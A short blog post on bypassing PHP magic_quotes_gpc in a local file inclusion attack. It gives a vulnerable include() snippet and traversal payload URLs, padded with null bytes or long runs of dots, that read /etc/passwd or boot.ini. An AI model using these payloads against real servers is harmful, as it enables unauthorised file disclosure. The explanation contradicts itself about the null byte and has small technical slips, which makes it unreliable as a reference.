Local File Inclusion with Magic_quotes_gpc enabled

<< Back to blog

So, lets look at a piece of code:

<?php include(‘inc/’.$_GET[‘page’].’php’); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar
———————-
Advert: Download icnd training material from testking and guarantee pass your HP0-J33 as well as HP0-J34 exams on first jump.

10 Comments

2 Trackbacks

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>